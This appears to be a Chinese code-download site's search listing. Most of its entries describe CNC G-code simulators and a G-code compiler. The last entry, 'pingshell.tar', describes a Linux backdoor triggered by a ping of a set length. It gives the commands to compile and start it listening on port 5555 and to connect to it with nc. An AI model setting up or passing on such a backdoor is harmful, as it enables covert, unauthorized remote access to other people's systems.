搜索资源列表
NCCodeSimulator
- 五轴NC代码模拟器,输入NC代码可以显示刀具路径和走刀过程。用VC++6.0 可以打开并编译-Five-axis NC code simulator, enter the NC code can display the process of tool path and tool path. With VC++6.0 can open and compile
GCodeCompiles
- 这个文件里一直有一个源文件,主要是对数控系统中用到的G代码进行语法和词法分析,编译,对搞数控的兄弟有一定的参考价值。-This file has been a source file, mainly used in the numerical control system, G-code syntax and lexical analysis, compile, NC brothers are engaged in a certain reference value.
Src
- 三轴NC代码模拟器,输入NC代码,实时显示材料切除。用VS2005可以打开并编译。-Three-axis NC code simulator, enter the NC code, real-time display material removal. Can open and compile with VS2005.
pingshell.tar
- 一个linux的pingshell后门,首先编译pingshell.c后门, 编译后生成的pingshell这个文件就是我们的后门了,然后使用命令 pingshell 1017 5555,意思是当接受当ping包长度为1017时监听本地5555端口,ping -l 1017 127.0.0.1 然后用nc进行连接,nc -nvv ip 5555即可。 注:这种后门有个问题就是如果进行暴力破解的话,也不太安全》-First compile pingshell.c